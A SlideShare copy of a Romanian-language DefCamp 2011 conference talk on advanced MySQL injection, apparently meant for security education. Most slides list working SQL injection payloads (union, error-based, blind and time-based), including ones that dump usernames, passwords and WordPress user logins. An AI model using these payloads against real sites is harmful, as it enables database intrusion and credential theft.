SlideShare a Scribd company logo
1 of 20
DEFCAMP – 2011 “Advanced Data Mining                 in MySQL Injections  using Subqueries & Custom Variables”
Advanced Data Mining  in MySQL Injections using Subqueries & Custom Variables _______________________________________________________________________ - CUPRINS - [ * ]  Notiuni introductive:  SQL ,  Injectii SQL [ * ]  Variabile Particularizate si Sub-Interogari in MySQL [ * ]  Optimizarea tehnicilor clasice de extragere a informatiilor :   - variabile MySQL  ( Server System Variables / Session Variables )  - bazele de date disponibile ( schema_name / SCHEMATA )  - tabelele si coloanele aferente acestora ( table_name / column_name )   - privilegii ( USER_PRIVILEGES :  GRANTEE/PRIVILEGE_TYPE/IS_GRANTABLE )  - citirea & scrierea fisierelor ( LOAD_FILE / INTO DUMPFILE - OUTFILE) - atacuri Denial of Service ( DOS )
Advanced Data Mining  in MySQL Injections using Subqueries & Custom Variables _______________________________________________________________________ Structured Query Language (SQL - limbajul structurat de interogare) este limbajul standard folosit pentru manipularea si regasirea datelor din baze de date relationale. Prin SQL, un programator sau un administrator de baze de date poate face urmatoarele lucruri: * sa modifice structura unei baze de date ;           * sa schimbe valorile de configurare pentru securitatea sistemului;           * sa adauge drepturi utilizatorilor asupra bazelor de date sau tabelelor;           * sa interogheze o baza de date asupra unor informatii;           * sa actualizeze continutul unei baze de date.
Advanced Data Mining  in MySQL Injections using Subqueries & Custom Variables _______________________________________________________________________ Cum functioneaza PHP + MySQL ?  <  request-ul efectuat de catre client < procesarea request-ului la nivel de server < raspunsul trimis catre client               ca rezultat  al cererii
Advanced Data Mining  in MySQL Injections using Subqueries & Custom Variables _______________________________________________________________________  What could possibly go wrong ? !!!!!!
Advanced Data Mining  in MySQL Injections using Subqueries & Custom Variables _______________________________________________________________________ SQL Injections ( Injectii SQL ) – tehnica de malformare a sintaxei SQL datorata modificarii valorilor parametrilor $_GET, $_POST, cookies, headers, ce sunt preluate si prelucrate de fisierele server-side fara a filtra in prealabil caractere sau comenzi ce pot fi periculoase.
Advanced Data Mining  in MySQL Injections using Subqueries & Custom Variables _______________________________________________________________________ Exemplu de injectie MySQL clasica.
Advanced Data Mining  in MySQL Injections using Subqueries & Custom Variables _______________________________________________________________________ Tipuri de injectii SQL : UNION BASED index.php?id=1’ and 2=4  UNION SELECT 1,2,3,4,5,6,7,8,9,10 -- index.php?poze=vedete"+and+false+union+all+select+1,2,version(),4,5,6+and+"1"="1 index.php?id=-1+UNION+SELECT+1,convert(@@version using latin1),3,4,5-- index.php? id=-1/*!AND*/1=1+UNiOn+ALl+SelECt+1,/**/2,/**/3,/**/4/**/limit/**/1,2 index.php?id=1+and+1=0+union+select+ sql_no_cache+1,2,3,4,5
Advanced Data Mining  in MySQL Injections using Subqueries & Custom Variables _______________________________________________________________________ Tipuri de injectii SQL : UNION BASED
Advanced Data Mining  in MySQL Injections using Subqueries & Custom Variables _______________________________________________________________________ Tipuri de injectii SQL : ERROR BASED index.php?id=(@:=1)||@+group+by+concat(@@version,!@)having@||min(@:=0)--+ Index.php?id=53+OR+(SELECT+COUNT(*)+FROM+(SELECT+1+UNION+SELECT+2+UNION+SELECT+3)x+GROUP+BY+CONCAT(MID((select+concat_ws(0x3a,version(),database(),user())),1,63),+FLOOR(RAND(0)*2)))+--+ news.php?id=589'+or+1+group+by+concat((select+version()),floor(rand(0)*2))+having+min(0)+or+1-- + details.php?ID=9 or (select count(*) from mysql.user group by concat(version(),floor(rand(0)*2)))-- ?productid=1124+and+row(1,2)in(select+count(*),concat((select+table_name+from+information_schema.tables+limit+3,1),0x3a,floor(rand(0)*2))as+a+from+information_schema.tables+x+group+by+a)--
Advanced Data Mining  in MySQL Injections using Subqueries & Custom Variables _______________________________________________________________________ Tipuri de injectii SQL : ERROR BASED
Advanced Data Mining  in MySQL Injections using Subqueries & Custom Variables _______________________________________________________________________ Tipuri de injectii SQL : BLIND index.php?id=1’ and substring(@@version,1,1)=4-- index.php?id=1’ and substring(@@version,1,1)=5-- index.php?id=1 and (SELECT 1 from admin limit 0,1)=1 news.php?id = -1 'OR id = IF(ASCII(SUBSTRING (SELECT USER ()), 1, 1 )))>= 100, 1, SLEEP (3))  index.html?mdl=5020+and+ascii(lower(substring((select+table_name+from+information_schema.tables+limit+17,1),1,1 )))>1 index.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>103 script.php?par=1 and IF(ASCII(SUBSTRING((SELECT USER()),1,1)))>=100,1, BENCHMARK(2000000,MD5(NOW()))) – script.php?par=1 and IF(ASCII(SUBSTRING((SELECT USER()), 1, 1)))>=100, 1, SLEEP(3)) --
Advanced Data Mining  in MySQL Injections using Subqueries & Custom Variables _______________________________________________________________________ Tipuri de injectii SQL : BLIND
Advanced Data Mining  in MySQL Injections using Subqueries & Custom Variables _______________________________________________________________________ MySQL Custom Variables (Variabile Particularizate)
Advanced Data Mining  in MySQL Injections using Subqueries & Custom Variables _______________________________________________________________________ MySQL Sub-Queries (Sub-Interogari) SELECT * FROM t1 WHERE column1 = (SELECT column1 FROM t2);
Advanced Data Mining  in MySQL Injections using Subqueries & Custom Variables _______________________________________________________________________ Injectii MySQL - folosind Custom Variables : CLASIC SYNTAX : index.php?id=2’+and+1=0+union+select+1,2,3,4,5-- NEW SYNTAX: index.php?id=2’+and+1=0+union+select+@i:=version(),@i,@i,@i,@i-- @i:=concat( version(),0x3a,database() ) @i:=cast(version()+as+binary) @i:=convert(version(),binary) @i:=convert(version()+using+latin1) @i:=aes_decrypt(aes_encrypt(version(),1),1) @x:=concat(0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name)
Advanced Data Mining  in MySQL Injections using Subqueries & Custom Variables _______________________________________________________________________ Injectii MySQL - folosind SubQueries : index.php?id = -1+union+select+*+from+users,(select+1,2,3,4,5,6)a-- index.php?id=-1+union+(select 1,2,3,4,5 order by 1 where 1=2) UNION (select1,2,3,4,5)--+--X id=3 AND (SELECT 7574 FROM(SELECT COUNT(*) ,CONCAT(CHAR(58,103,104,115,58),(SELECT (CASE WHEN (7574=7574) THEN 1 ELSE 0 END)), CHAR(58,101,118,118,58), FLOOR(RAND(0)*2))x  FROM information_schema.tables GROUP BY x)a)
Advanced Data Mining  in MySQL Injections using Subqueries & Custom Variables _______________________________________________________________________ Injectii MySQL - folosind SubQueries + Custom Variables : index.php?id=-4  union select 1,2,(select(@x) from(select(@x:=0x00) , (select (null) from (information_schema.columns) where (table_schema!=‘information_schema’) and (0x00) in (@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),4-- index.php?id=-1 Union select 1,2, concat(@i:=0x00,@o:=0x0d0a, benchmark(150, @o:=CONCAT(@o,0x0d0a,(SELECT+concat(@i:=mail,0x3a,password)+from+customers+WHERE+mail > @i+order+by+mail+LIMIT+1+))),o),4  index.php?id=-7’ union (select * from (select @i:=version())q join (select@i)w join (select@i)e join (select @i)r join (select @i)t join (select @i)y join (select @i)u join (select @i)i join (select @i)o)--+--qwertyxxxxxxxx
Advanced Data Mining  in MySQL Injections using Subqueries & Custom Variables _______________________________________________________________________ Injectii MySQL - folosind SubQueries + Custom Variables : index.php?id=2'+and+1=0+union+select+1,2,3,4,concat(@i:=0x00,@o:=0xd0a,benchmark(1010370,@o:=CONCAT(@o,0xd0a,(SELECT+concat(0x3c62723e,@i:=user_login)+FROM+wp_users+WHERE+user_login>@i+order+by+user_login+LIMIT+1))),@o),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+information_schema.tables--
………

More Related Content

Similar to Advanced data mining in my sql injections using subqueries and custom variables

24 HOP edición Español -Diferentes técnicas de administración de logins y usu...
24 HOP edición Español -Diferentes técnicas de administración de logins y usu...24 HOP edición Español -Diferentes técnicas de administración de logins y usu...
24 HOP edición Español -Diferentes técnicas de administración de logins y usu...
SpanishPASSVC
 
Granular Archival and Nearline Storage Using MySQL, S3, and SQS
Granular Archival and Nearline Storage Using MySQL, S3, and SQSGranular Archival and Nearline Storage Using MySQL, S3, and SQS
Granular Archival and Nearline Storage Using MySQL, S3, and SQS
waltjones
 
World2016_T5_S5_SQLServerFunctionalOverview
World2016_T5_S5_SQLServerFunctionalOverviewWorld2016_T5_S5_SQLServerFunctionalOverview
World2016_T5_S5_SQLServerFunctionalOverview
Farah Omer
 

Similar to Advanced data mining in my sql injections using subqueries and custom variables (20)

How Can I tune it When I Can't Change the Code?
How Can I tune it When I Can't Change the Code?How Can I tune it When I Can't Change the Code?
How Can I tune it When I Can't Change the Code?
 
Query Optimization with MySQL 5.7 and MariaDB 10: Even newer tricks
Query Optimization with MySQL 5.7 and MariaDB 10: Even newer tricksQuery Optimization with MySQL 5.7 and MariaDB 10: Even newer tricks
Query Optimization with MySQL 5.7 and MariaDB 10: Even newer tricks
 
Whatsnew in-my sql-primary
Whatsnew in-my sql-primaryWhatsnew in-my sql-primary
Whatsnew in-my sql-primary
 
24 HOP edición Español -Diferentes técnicas de administración de logins y usu...
24 HOP edición Español -Diferentes técnicas de administración de logins y usu...24 HOP edición Español -Diferentes técnicas de administración de logins y usu...
24 HOP edición Español -Diferentes técnicas de administración de logins y usu...
 
Database versioning with liquibase
Database versioning with liquibaseDatabase versioning with liquibase
Database versioning with liquibase
 
Oracle Data Redaction
Oracle Data RedactionOracle Data Redaction
Oracle Data Redaction
 
Partially Contained Databases
Partially Contained DatabasesPartially Contained Databases
Partially Contained Databases
 
Oracle Data Redaction
Oracle Data RedactionOracle Data Redaction
Oracle Data Redaction
 
Upgrading to my sql 8.0
Upgrading to my sql 8.0Upgrading to my sql 8.0
Upgrading to my sql 8.0
 
Granular Archival and Nearline Storage Using MySQL, S3, and SQS
Granular Archival and Nearline Storage Using MySQL, S3, and SQSGranular Archival and Nearline Storage Using MySQL, S3, and SQS
Granular Archival and Nearline Storage Using MySQL, S3, and SQS
 
World2016_T5_S5_SQLServerFunctionalOverview
World2016_T5_S5_SQLServerFunctionalOverviewWorld2016_T5_S5_SQLServerFunctionalOverview
World2016_T5_S5_SQLServerFunctionalOverview
 
20764 Administering a SQL Database Infrastructure Training @ multisoft Systems
20764 Administering a SQL Database Infrastructure Training @ multisoft Systems20764 Administering a SQL Database Infrastructure Training @ multisoft Systems
20764 Administering a SQL Database Infrastructure Training @ multisoft Systems
 
Mysqlsecurityoptionsjan2021
Mysqlsecurityoptionsjan2021Mysqlsecurityoptionsjan2021
Mysqlsecurityoptionsjan2021
 
MySQL Day Roma - MySQL Shell and Visual Studio Code Extension
MySQL Day Roma - MySQL Shell and Visual Studio Code ExtensionMySQL Day Roma - MySQL Shell and Visual Studio Code Extension
MySQL Day Roma - MySQL Shell and Visual Studio Code Extension
 
SQL Server 2017 - Adaptive Query Processing and Automatic Query Tuning
SQL Server 2017 - Adaptive Query Processing and Automatic Query TuningSQL Server 2017 - Adaptive Query Processing and Automatic Query Tuning
SQL Server 2017 - Adaptive Query Processing and Automatic Query Tuning
 
Liquibase migration for data bases
Liquibase migration for data basesLiquibase migration for data bases
Liquibase migration for data bases
 
Using MySQL Meta Data Effectively
Using MySQL Meta Data EffectivelyUsing MySQL Meta Data Effectively
Using MySQL Meta Data Effectively
 
Upgrade to MySQL 5.7 and latest news planned for MySQL 8
Upgrade to MySQL 5.7 and latest news planned for MySQL 8Upgrade to MySQL 5.7 and latest news planned for MySQL 8
Upgrade to MySQL 5.7 and latest news planned for MySQL 8
 
SQL Server 2016 BI updates
SQL Server 2016 BI updatesSQL Server 2016 BI updates
SQL Server 2016 BI updates
 
Trivadis TechEvent 2017 Oracle to My SQL Migration - Challenges by Robert Bia...
Trivadis TechEvent 2017 Oracle to My SQL Migration - Challenges by Robert Bia...Trivadis TechEvent 2017 Oracle to My SQL Migration - Challenges by Robert Bia...
Trivadis TechEvent 2017 Oracle to My SQL Migration - Challenges by Robert Bia...
 

More from DefCamp

More from DefCamp (20)

Remote Yacht Hacking
Remote Yacht HackingRemote Yacht Hacking
Remote Yacht Hacking
 
Mobile, IoT, Clouds… It’s time to hire your own risk manager!
Mobile, IoT, Clouds… It’s time to hire your own risk manager!Mobile, IoT, Clouds… It’s time to hire your own risk manager!
Mobile, IoT, Clouds… It’s time to hire your own risk manager!
 
The Charter of Trust
The Charter of TrustThe Charter of Trust
The Charter of Trust
 
Internet Balkanization: Why Are We Raising Borders Online?
Internet Balkanization: Why Are We Raising Borders Online?Internet Balkanization: Why Are We Raising Borders Online?
Internet Balkanization: Why Are We Raising Borders Online?
 
Bridging the gap between CyberSecurity R&D and UX
Bridging the gap between CyberSecurity R&D and UXBridging the gap between CyberSecurity R&D and UX
Bridging the gap between CyberSecurity R&D and UX
 
Secure and privacy-preserving data transmission and processing using homomorp...
Secure and privacy-preserving data transmission and processing using homomorp...Secure and privacy-preserving data transmission and processing using homomorp...
Secure and privacy-preserving data transmission and processing using homomorp...
 
Drupalgeddon 2 – Yet Another Weapon for the Attacker
Drupalgeddon 2 – Yet Another Weapon for the AttackerDrupalgeddon 2 – Yet Another Weapon for the Attacker
Drupalgeddon 2 – Yet Another Weapon for the Attacker
 
Economical Denial of Sustainability in the Cloud (EDOS)
Economical Denial of Sustainability in the Cloud (EDOS)Economical Denial of Sustainability in the Cloud (EDOS)
Economical Denial of Sustainability in the Cloud (EDOS)
 
Trust, but verify – Bypassing MFA
Trust, but verify – Bypassing MFATrust, but verify – Bypassing MFA
Trust, but verify – Bypassing MFA
 
Threat Hunting: From Platitudes to Practical Application
Threat Hunting: From Platitudes to Practical ApplicationThreat Hunting: From Platitudes to Practical Application
Threat Hunting: From Platitudes to Practical Application
 
Building application security with 0 money down
Building application security with 0 money downBuilding application security with 0 money down
Building application security with 0 money down
 
Implementation of information security techniques on modern android based Kio...
Implementation of information security techniques on modern android based Kio...Implementation of information security techniques on modern android based Kio...
Implementation of information security techniques on modern android based Kio...
 
Lattice based Merkle for post-quantum epoch
Lattice based Merkle for post-quantum epochLattice based Merkle for post-quantum epoch
Lattice based Merkle for post-quantum epoch
 
The challenge of building a secure and safe digital environment in healthcare
The challenge of building a secure and safe digital environment in healthcareThe challenge of building a secure and safe digital environment in healthcare
The challenge of building a secure and safe digital environment in healthcare
 
Timing attacks against web applications: Are they still practical?
Timing attacks against web applications: Are they still practical?Timing attacks against web applications: Are they still practical?
Timing attacks against web applications: Are they still practical?
 
Tor .onions: The Good, The Rotten and The Misconfigured
Tor .onions: The Good, The Rotten and The Misconfigured Tor .onions: The Good, The Rotten and The Misconfigured
Tor .onions: The Good, The Rotten and The Misconfigured
 
Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...
Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...
Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...
 
We will charge you. How to [b]reach vendor’s network using EV charging station.
We will charge you. How to [b]reach vendor’s network using EV charging station.We will charge you. How to [b]reach vendor’s network using EV charging station.
We will charge you. How to [b]reach vendor’s network using EV charging station.
 
Connect & Inspire Cyber Security
Connect & Inspire Cyber SecurityConnect & Inspire Cyber Security
Connect & Inspire Cyber Security
 
The lions and the watering hole
The lions and the watering holeThe lions and the watering hole
The lions and the watering hole
 

Recently uploaded

Future Visions: Predictions to Guide and Time Tech Innovation, Peter Udo Diehl
Future Visions: Predictions to Guide and Time Tech Innovation, Peter Udo DiehlFuture Visions: Predictions to Guide and Time Tech Innovation, Peter Udo Diehl
Future Visions: Predictions to Guide and Time Tech Innovation, Peter Udo Diehl
Peter Udo Diehl
 

Recently uploaded (20)

Behind the Scenes From the Manager's Chair: Decoding the Secrets of Successfu...
Behind the Scenes From the Manager's Chair: Decoding the Secrets of Successfu...Behind the Scenes From the Manager's Chair: Decoding the Secrets of Successfu...
Behind the Scenes From the Manager's Chair: Decoding the Secrets of Successfu...
 
ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...
ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...
ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...
 
Google I/O Extended 2024 Warsaw
Google I/O Extended 2024 WarsawGoogle I/O Extended 2024 Warsaw
Google I/O Extended 2024 Warsaw
 
Choosing the Right FDO Deployment Model for Your Application _ Geoffrey at In...
Choosing the Right FDO Deployment Model for Your Application _ Geoffrey at In...Choosing the Right FDO Deployment Model for Your Application _ Geoffrey at In...
Choosing the Right FDO Deployment Model for Your Application _ Geoffrey at In...
 
Overview of Hyperledger Foundation
Overview of Hyperledger FoundationOverview of Hyperledger Foundation
Overview of Hyperledger Foundation
 
Future Visions: Predictions to Guide and Time Tech Innovation, Peter Udo Diehl
Future Visions: Predictions to Guide and Time Tech Innovation, Peter Udo DiehlFuture Visions: Predictions to Guide and Time Tech Innovation, Peter Udo Diehl
Future Visions: Predictions to Guide and Time Tech Innovation, Peter Udo Diehl
 
How we scaled to 80K users by doing nothing!.pdf
How we scaled to 80K users by doing nothing!.pdfHow we scaled to 80K users by doing nothing!.pdf
How we scaled to 80K users by doing nothing!.pdf
 
Unpacking Value Delivery - Agile Oxford Meetup - May 2024.pptx
Unpacking Value Delivery - Agile Oxford Meetup - May 2024.pptxUnpacking Value Delivery - Agile Oxford Meetup - May 2024.pptx
Unpacking Value Delivery - Agile Oxford Meetup - May 2024.pptx
 
Linux Foundation Edge _ Overview of FDO Software Components _ Randy at Intel.pdf
Linux Foundation Edge _ Overview of FDO Software Components _ Randy at Intel.pdfLinux Foundation Edge _ Overview of FDO Software Components _ Randy at Intel.pdf
Linux Foundation Edge _ Overview of FDO Software Components _ Randy at Intel.pdf
 
WebAssembly is Key to Better LLM Performance
WebAssembly is Key to Better LLM PerformanceWebAssembly is Key to Better LLM Performance
WebAssembly is Key to Better LLM Performance
 
Easier, Faster, and More Powerful – Notes Document Properties Reimagined
Easier, Faster, and More Powerful – Notes Document Properties ReimaginedEasier, Faster, and More Powerful – Notes Document Properties Reimagined
Easier, Faster, and More Powerful – Notes Document Properties Reimagined
 
Optimizing NoSQL Performance Through Observability
Optimizing NoSQL Performance Through ObservabilityOptimizing NoSQL Performance Through Observability
Optimizing NoSQL Performance Through Observability
 
FDO for Camera, Sensor and Networking Device – Commercial Solutions from VinC...
FDO for Camera, Sensor and Networking Device – Commercial Solutions from VinC...FDO for Camera, Sensor and Networking Device – Commercial Solutions from VinC...
FDO for Camera, Sensor and Networking Device – Commercial Solutions from VinC...
 
Integrating Telephony Systems with Salesforce: Insights and Considerations, B...
Integrating Telephony Systems with Salesforce: Insights and Considerations, B...Integrating Telephony Systems with Salesforce: Insights and Considerations, B...
Integrating Telephony Systems with Salesforce: Insights and Considerations, B...
 
Intro in Product Management - Коротко про професію продакт менеджера
Intro in Product Management - Коротко про професію продакт менеджераIntro in Product Management - Коротко про професію продакт менеджера
Intro in Product Management - Коротко про професію продакт менеджера
 
Designing for Hardware Accessibility at Comcast
Designing for Hardware Accessibility at ComcastDesigning for Hardware Accessibility at Comcast
Designing for Hardware Accessibility at Comcast
 
ECS 2024 Teams Premium - Pretty Secure
ECS 2024   Teams Premium - Pretty SecureECS 2024   Teams Premium - Pretty Secure
ECS 2024 Teams Premium - Pretty Secure
 
Microsoft CSP Briefing Pre-Engagement - Questionnaire
Microsoft CSP Briefing Pre-Engagement - QuestionnaireMicrosoft CSP Briefing Pre-Engagement - Questionnaire
Microsoft CSP Briefing Pre-Engagement - Questionnaire
 
The Value of Certifying Products for FDO _ Paul at FIDO Alliance.pdf
The Value of Certifying Products for FDO _ Paul at FIDO Alliance.pdfThe Value of Certifying Products for FDO _ Paul at FIDO Alliance.pdf
The Value of Certifying Products for FDO _ Paul at FIDO Alliance.pdf
 
TopCryptoSupers 12thReport OrionX May2024
TopCryptoSupers 12thReport OrionX May2024TopCryptoSupers 12thReport OrionX May2024
TopCryptoSupers 12thReport OrionX May2024
 

Advanced data mining in my sql injections using subqueries and custom variables

  • 1. DEFCAMP – 2011 “Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables”
  • 2. Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables _______________________________________________________________________ - CUPRINS - [ * ] Notiuni introductive: SQL , Injectii SQL [ * ] Variabile Particularizate si Sub-Interogari in MySQL [ * ] Optimizarea tehnicilor clasice de extragere a informatiilor : - variabile MySQL ( Server System Variables / Session Variables ) - bazele de date disponibile ( schema_name / SCHEMATA ) - tabelele si coloanele aferente acestora ( table_name / column_name ) - privilegii ( USER_PRIVILEGES : GRANTEE/PRIVILEGE_TYPE/IS_GRANTABLE ) - citirea & scrierea fisierelor ( LOAD_FILE / INTO DUMPFILE - OUTFILE) - atacuri Denial of Service ( DOS )
  • 3. Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables _______________________________________________________________________ Structured Query Language (SQL - limbajul structurat de interogare) este limbajul standard folosit pentru manipularea si regasirea datelor din baze de date relationale. Prin SQL, un programator sau un administrator de baze de date poate face urmatoarele lucruri: * sa modifice structura unei baze de date ; * sa schimbe valorile de configurare pentru securitatea sistemului; * sa adauge drepturi utilizatorilor asupra bazelor de date sau tabelelor; * sa interogheze o baza de date asupra unor informatii; * sa actualizeze continutul unei baze de date.
  • 4. Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables _______________________________________________________________________ Cum functioneaza PHP + MySQL ? < request-ul efectuat de catre client < procesarea request-ului la nivel de server < raspunsul trimis catre client ca rezultat al cererii
  • 5. Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables _______________________________________________________________________ What could possibly go wrong ? !!!!!!
  • 6. Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables _______________________________________________________________________ SQL Injections ( Injectii SQL ) – tehnica de malformare a sintaxei SQL datorata modificarii valorilor parametrilor $_GET, $_POST, cookies, headers, ce sunt preluate si prelucrate de fisierele server-side fara a filtra in prealabil caractere sau comenzi ce pot fi periculoase.
  • 7. Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables _______________________________________________________________________ Exemplu de injectie MySQL clasica.
  • 8. Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables _______________________________________________________________________ Tipuri de injectii SQL : UNION BASED index.php?id=1’ and 2=4 UNION SELECT 1,2,3,4,5,6,7,8,9,10 -- index.php?poze=vedete"+and+false+union+all+select+1,2,version(),4,5,6+and+"1"="1 index.php?id=-1+UNION+SELECT+1,convert(@@version using latin1),3,4,5-- index.php? id=-1/*!AND*/1=1+UNiOn+ALl+SelECt+1,/**/2,/**/3,/**/4/**/limit/**/1,2 index.php?id=1+and+1=0+union+select+ sql_no_cache+1,2,3,4,5
  • 9. Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables _______________________________________________________________________ Tipuri de injectii SQL : UNION BASED
  • 10. Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables _______________________________________________________________________ Tipuri de injectii SQL : ERROR BASED index.php?id=(@:=1)||@+group+by+concat(@@version,!@)having@||min(@:=0)--+ Index.php?id=53+OR+(SELECT+COUNT(*)+FROM+(SELECT+1+UNION+SELECT+2+UNION+SELECT+3)x+GROUP+BY+CONCAT(MID((select+concat_ws(0x3a,version(),database(),user())),1,63),+FLOOR(RAND(0)*2)))+--+ news.php?id=589'+or+1+group+by+concat((select+version()),floor(rand(0)*2))+having+min(0)+or+1-- + details.php?ID=9 or (select count(*) from mysql.user group by concat(version(),floor(rand(0)*2)))-- ?productid=1124+and+row(1,2)in(select+count(*),concat((select+table_name+from+information_schema.tables+limit+3,1),0x3a,floor(rand(0)*2))as+a+from+information_schema.tables+x+group+by+a)--
  • 11. Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables _______________________________________________________________________ Tipuri de injectii SQL : ERROR BASED
  • 12. Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables _______________________________________________________________________ Tipuri de injectii SQL : BLIND index.php?id=1’ and substring(@@version,1,1)=4-- index.php?id=1’ and substring(@@version,1,1)=5-- index.php?id=1 and (SELECT 1 from admin limit 0,1)=1 news.php?id = -1 'OR id = IF(ASCII(SUBSTRING (SELECT USER ()), 1, 1 )))>= 100, 1, SLEEP (3)) index.html?mdl=5020+and+ascii(lower(substring((select+table_name+from+information_schema.tables+limit+17,1),1,1 )))>1 index.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>103 script.php?par=1 and IF(ASCII(SUBSTRING((SELECT USER()),1,1)))>=100,1, BENCHMARK(2000000,MD5(NOW()))) – script.php?par=1 and IF(ASCII(SUBSTRING((SELECT USER()), 1, 1)))>=100, 1, SLEEP(3)) --
  • 13. Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables _______________________________________________________________________ Tipuri de injectii SQL : BLIND
  • 14. Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables _______________________________________________________________________ MySQL Custom Variables (Variabile Particularizate)
  • 15. Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables _______________________________________________________________________ MySQL Sub-Queries (Sub-Interogari) SELECT * FROM t1 WHERE column1 = (SELECT column1 FROM t2);
  • 16. Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables _______________________________________________________________________ Injectii MySQL - folosind Custom Variables : CLASIC SYNTAX : index.php?id=2’+and+1=0+union+select+1,2,3,4,5-- NEW SYNTAX: index.php?id=2’+and+1=0+union+select+@i:=version(),@i,@i,@i,@i-- @i:=concat( version(),0x3a,database() ) @i:=cast(version()+as+binary) @i:=convert(version(),binary) @i:=convert(version()+using+latin1) @i:=aes_decrypt(aes_encrypt(version(),1),1) @x:=concat(0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name)
  • 17. Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables _______________________________________________________________________ Injectii MySQL - folosind SubQueries : index.php?id = -1+union+select+*+from+users,(select+1,2,3,4,5,6)a-- index.php?id=-1+union+(select 1,2,3,4,5 order by 1 where 1=2) UNION (select1,2,3,4,5)--+--X id=3 AND (SELECT 7574 FROM(SELECT COUNT(*) ,CONCAT(CHAR(58,103,104,115,58),(SELECT (CASE WHEN (7574=7574) THEN 1 ELSE 0 END)), CHAR(58,101,118,118,58), FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
  • 18. Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables _______________________________________________________________________ Injectii MySQL - folosind SubQueries + Custom Variables : index.php?id=-4 union select 1,2,(select(@x) from(select(@x:=0x00) , (select (null) from (information_schema.columns) where (table_schema!=‘information_schema’) and (0x00) in (@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),4-- index.php?id=-1 Union select 1,2, concat(@i:=0x00,@o:=0x0d0a, benchmark(150, @o:=CONCAT(@o,0x0d0a,(SELECT+concat(@i:=mail,0x3a,password)+from+customers+WHERE+mail > @i+order+by+mail+LIMIT+1+))),o),4 index.php?id=-7’ union (select * from (select @i:=version())q join (select@i)w join (select@i)e join (select @i)r join (select @i)t join (select @i)y join (select @i)u join (select @i)i join (select @i)o)--+--qwertyxxxxxxxx
  • 19. Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables _______________________________________________________________________ Injectii MySQL - folosind SubQueries + Custom Variables : index.php?id=2'+and+1=0+union+select+1,2,3,4,concat(@i:=0x00,@o:=0xd0a,benchmark(1010370,@o:=CONCAT(@o,0xd0a,(SELECT+concat(0x3c62723e,@i:=user_login)+FROM+wp_users+WHERE+user_login>@i+order+by+user_login+LIMIT+1))),@o),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+information_schema.tables--

Editor's Notes

  1. 127.0.0.1/defcamp/0_o/index.php?id=2&apos;+and+1=0+union+select+1,2,3,4,concat(@i:=0x00,@o:=0xd0a,benchmark(1010370,@o:=CONCAT(@o,0xd0a,(SELECT+concat(0x3c62723e,@i:=user_login)+FROM+wp_users+WHERE+user_login&gt;@i+order+by+user_login+LIMIT+1))),@o),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+information_schema.tables--
  2. 127.0.0.1/defcamp/0_o/index.php?id=2&apos;+and+1=0+union+select+1,2,3,4,concat(@i:=0x00,@o:=0xd0a,benchmark(1010370,@o:=CONCAT(@o,0xd0a,(SELECT+concat(0x3c62723e,@i:=user_login)+FROM+wp_users+WHERE+user_login&gt;@i+order+by+user_login+LIMIT+1))),@o),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+information_schema.tables--